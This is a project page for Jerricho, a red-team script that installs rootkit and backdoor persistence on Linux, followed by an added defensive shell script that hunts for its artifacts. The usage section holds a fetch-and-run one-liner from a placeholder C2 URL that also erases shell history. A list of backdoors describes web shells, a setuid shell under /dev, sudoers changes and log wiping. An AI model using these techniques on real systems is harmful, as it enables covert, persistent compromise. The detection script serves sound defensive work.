Jerricho - a script for deploying a simple Linux rootkit and backdoors.

Jerricho is a simple Bourne shell script that quickly drops several persistence mechanisms on a target Linux host. OS support: Ubuntu, CentOS, Debian, FreeBSD.

– Add a web interface for managing the connections and running commands.
– Automatically pull down passwords from the local systems, then store and sort them accordingly.
– Add a function to check whether the system is still infected / running the rootkit and backdoors and, if not, re-execute/re-infect the system.
– Aggregate sniffer logs.
– Keep track of hosts that are still accessible via the rootkit.
– Add bin to sudoers.
– Clean up logs better (could probably do a date check when we execute on the system and remove all log lines from 5 seconds before to 15 seconds after).
– Spider and revert sshd_config.
– Rootkit: specify multiple ports on the command line.
– Add iptables -F to all init scripts.
– Change the timestamps of modified files.

Usage:
+ You run it as root and it drops a bunch of backdoors in multiple places. This enabled us to easily retain access at regionals for almost all systems.

+ Runs stuff out of "/dev/…" and "/dev/  " (2 spaces) because hiding in plain sight is easy.

+ To run via an msf session: sessions -c export HISTFILE=/dev/null; wget -q $C2_URL/scripts/ -O /dev/stdout | /bin/sh - && history -c

The C2 URL and C2 IP address must be changed.

This creates several ways back in:
1) drops our kernel rootkit, which hooks accept() — lets us back in via any listening port, hides processes, etc.
2) adds a root SSH key
3) drops our modified trixd00rd (takes params from env vars) as 'rsyslogd'
4) drops the rooty ICMP backdoor as 'udevd'
5) backdoors the 'bin' system account and adds it to sudoers
6) adds a setuid shell in "/dev/ /" for re-elevation from the php/bin account if needed
7) drops a basic PHP shell in a couple of likely web roots (http://url/.src.php?e=uptime)
8) adds all likely webserver users to sudoers (www-data, apache, httpd)

– removes all entries from who (removes and re-creates the utmp file; we can be selective later)
– optionally installs a root crontab to clear iptables rules every 5 minutes (uncomment the iptables stuff if needed)
– optionally runs a bash script that takes down all services every 10s (teams lose points; also currently disabled)
– adds a secondary pubkey location to sshd_config, sourcing keys from /etc/ssh/authorized_keys as well as the standard %h/.ssh dirs.
– We actually had people unknowingly remove the kernel backdoor through various upgrade and reboot activities, init script changes, etc., only for us to retain access using the web shell, re-elevate via the suid bin and reinstall.
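The list above doubles as an indicator list for the blue team. The following POSIX shell script is an added example written for this page, not part of Jerricho or its author's release: it hunts a filesystem for the artifacts the list names (service accounts in sudoers, an absolute AuthorizedKeysFile path in sshd_config, oddly named directories and setuid files under /dev, and .src.php in web roots). Every check takes a path prefix, so it can be pointed at a read-only mounted image as well as at the live host. The set of candidate web roots is an assumption, and the sample tree it builds for the demo run is constructed, not taken from a real system.

```sh
#!/bin/sh
# Hunt for the persistence artifacts the list above describes. Every check
# takes ROOT as a path prefix so it can run against a forensic image or a
# copied filesystem mounted read-only; ROOT=/ inspects the live host.
# Only reads are performed; findings are printed one per line.

# Sudo rights granted to service accounts (the page names bin, www-data,
# apache and httpd), in /etc/sudoers and any drop-in file.
check_sudoers() {
    root="$1"
    for f in "$root/etc/sudoers" "$root"/etc/sudoers.d/*; do
        [ -f "$f" ] || continue
        grep -En '^[[:space:]]*(bin|www-data|apache|httpd)[[:space:]]' "$f" \
            | sed "s|^|$f:|" || true
    done
}

# AuthorizedKeysFile pointing at an absolute path: the default entries are
# relative to the user's home (.ssh/authorized_keys), so a value such as
# /etc/ssh/authorized_keys is a second, host-wide key location.
check_sshd_config() {
    f="$1/etc/ssh/sshd_config"
    [ -f "$f" ] || return 0
    awk 'tolower($1) == "authorizedkeysfile" {
            for (i = 2; i <= NF; i++)
                if (index($i, "/") == 1) print FILENAME ":" NR ": " $0
         }' "$f"
}

# Directories directly under /dev whose names contain a space or consist of
# dots: /dev holds device nodes, and such names are chosen to be overlooked.
check_dev_dirs() {
    d="$1/dev"
    [ -d "$d" ] || return 0
    for e in "$d"/* "$d"/.*; do
        [ -d "$e" ] || continue
        name=${e##*/}
        case "$name" in
            .|..) ;;
            *' '*|...*) printf '%s\n' "$e" ;;
        esac
    done
}

# setuid regular files anywhere below /dev (there should be none).
check_dev_setuid() {
    d="$1/dev"
    [ -d "$d" ] || return 0
    find "$d" -type f -perm -4000 2>/dev/null
}

# The PHP shell is dropped as .src.php in web roots. The candidate roots
# below are an assumption; the page does not list which ones it uses.
check_web_roots() {
    for w in "$1/var/www" "$1/srv/http" "$1/usr/local/www" "$1/usr/share/nginx"; do
        [ -d "$w" ] || continue
        find "$w" -type f -name '.src.php' 2>/dev/null
    done
}

# Run every check, prefixing each finding with the check that produced it.
run_all_checks() {
    root="${1:-/}"
    for c in check_sudoers check_sshd_config check_dev_dirs \
             check_dev_setuid check_web_roots; do
        "$c" "$root" | sed "s/^/[$c] /"
    done
}

# Number of findings, for scripting.
finding_count() {
    run_all_checks "$1" | wc -l | tr -d ' '
}

# Constructed sample tree (not a real host) seeded with one instance of each
# artifact, so the script can be exercised offline.
build_sample_tree() {
    t="$1"
    mkdir -p "$t/etc/ssh" "$t/etc/sudoers.d" "$t/dev/  " "$t/dev/..." "$t/var/www/html"
    printf 'root ALL=(ALL) ALL\nwww-data ALL=(ALL) NOPASSWD: ALL\n' > "$t/etc/sudoers"
    printf 'bin ALL=(ALL) NOPASSWD: ALL\n' > "$t/etc/sudoers.d/90-bin"
    printf 'Port 22\nAuthorizedKeysFile .ssh/authorized_keys /etc/ssh/authorized_keys\n' \
        > "$t/etc/ssh/sshd_config"
    : > "$t/dev/  /sh"
    chmod 4755 "$t/dev/  /sh"        # empty file; only the mode bit matters here
    : > "$t/var/www/html/.src.php"
}

# With an argument, hunt under that prefix; without one, demonstrate on the
# constructed tree (expected: 7 findings).
if [ $# -gt 0 ]; then
    run_all_checks "$1"
else
    tmp=$(mktemp -d)
    build_sample_tree "$tmp"
    run_all_checks "$tmp"
    rm -rf "$tmp"
fi
```

Run it with no arguments to see the demo against the constructed tree, or as `sh hunt.sh /mnt/image` against a mounted copy of a suspect host. The checks are deliberately narrow and fast; they will not find a renamed process or a kernel module, so treat a clean result as "none of these specific artifacts", not as a clean host.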

Latest Released v-2.1 Code: